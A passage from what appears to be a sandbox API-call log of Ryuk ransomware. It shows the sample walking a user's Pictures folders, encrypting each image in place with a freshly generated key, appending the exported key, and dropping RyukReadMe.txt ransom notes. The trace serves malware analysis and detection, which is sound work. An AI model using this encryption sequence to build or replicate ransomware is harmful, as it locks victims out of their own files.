dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.016] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.016] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.016] CloseHandle (hObject=0x190) returned 1 [0158.031] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.040] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.040] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.040] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.040] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.040] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\rFICnKjX8fLwVo5D.jpg", dwFileAttributes=0x80) returned 1 [0158.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\rFICnKjX8fLwVo5D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\eetwpz3\\rficnkjx8flwvo5d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.041] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=95569) returned 1 [0158.041] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=95569) returned 1 [0158.041] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1742f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.041] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.042] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.042] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.042] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.042] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.042] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x17551, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x17551, lpOverlapped=0x0) returned 1 [0158.043] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.043] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x17551, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x17560) returned 1 [0158.044] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.044] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17560, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x17560, lpOverlapped=0x0) returned 1 [0158.044] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.044] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.044] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.044] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.044] CloseHandle (hObject=0x190) returned 1 [0158.061] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.066] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.066] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.066] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.066] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.066] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\YbbkX5hbRMc0zf1gM7md.png", dwFileAttributes=0x80) returned 1 [0158.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\YbbkX5hbRMc0zf1gM7md.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\eetwpz3\\ybbkx5hbrmc0zf1gm7md.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.067] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=76906) returned 1 [0158.067] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=76906) returned 1 [0158.067] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x12b48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.067] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.067] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.067] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.068] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.068] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.068] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12c6a, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x12c6a, lpOverlapped=0x0) returned 1 [0158.069] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.069] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12c6a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12c70) returned 1 [0158.069] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.069] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12c70, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x12c70, lpOverlapped=0x0) returned 1 [0158.070] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.070] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.070] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.070] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.070] CloseHandle (hObject=0x190) returned 1 [0158.085] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.089] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.089] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.089] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0158.089] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0158.089] SetLastError (dwErrCode=0x0) [0158.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\eEtwpZ3\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\eetwpz3\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.090] GetLastError () returned 0x0 [0158.090] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0158.091] CloseHandle (hObject=0x18c) returned 1 [0158.091] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.091] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.091] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\f5FdpPCC.bmp", dwFileAttributes=0x80) returned 1 [0158.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\f5FdpPCC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\f5fdppcc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.091] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=86211) returned 1 [0158.091] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=86211) returned 1 [0158.091] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x14fa1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.091] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.092] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.092] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.092] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.092] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.092] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x150c3, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x150c3, lpOverlapped=0x0) returned 1 [0158.093] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.094] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x150c3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x150d0) returned 1 [0158.094] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.094] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x150d0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x150d0, lpOverlapped=0x0) returned 1 [0158.094] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.094] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.094] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.095] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.095] CloseHandle (hObject=0x18c) returned 1 [0158.114] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.118] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.118] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.118] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.118] SetLastError (dwErrCode=0x0) [0158.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.118] GetLastError () returned 0xb7 [0158.118] CloseHandle (hObject=0x18c) returned 1 [0158.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0158.118] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.118] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.118] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.118] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\LlWTUsVghdBrCo41W.png", dwFileAttributes=0x80) returned 1 [0158.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\LlWTUsVghdBrCo41W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\hbk74mjqdk\\llwtusvghdbrco41w.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.119] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=25455) returned 1 [0158.119] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=25455) returned 1 [0158.119] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x624d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.119] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.120] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.120] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.120] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.120] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.120] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x636f, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x636f, lpOverlapped=0x0) returned 1 [0158.120] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.120] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x636f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x6370) returned 1 [0158.120] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.121] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6370, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x6370, lpOverlapped=0x0) returned 1 [0158.121] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.121] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.121] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.121] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.121] CloseHandle (hObject=0x190) returned 1 [0158.138] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.142] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.142] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.143] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.143] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.143] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\RVrGG1KMbo.png", dwFileAttributes=0x80) returned 1 [0158.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\RVrGG1KMbo.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\hbk74mjqdk\\rvrgg1kmbo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.145] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=28906) returned 1 [0158.145] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=28906) returned 1 [0158.145] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x6fc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.145] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.146] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.146] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.146] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.146] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.146] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x70ea, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x70ea, lpOverlapped=0x0) returned 1 [0158.147] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.147] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x70ea, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x70f0) returned 1 [0158.147] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.147] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x70f0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x70f0, lpOverlapped=0x0) returned 1 [0158.147] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.147] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.147] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.147] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.147] CloseHandle (hObject=0x190) returned 1 [0158.173] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.177] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.177] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.177] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.177] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.177] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\Ykuz0hkVXlw7uAd6 VsN.bmp", dwFileAttributes=0x80) returned 1 [0158.178] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 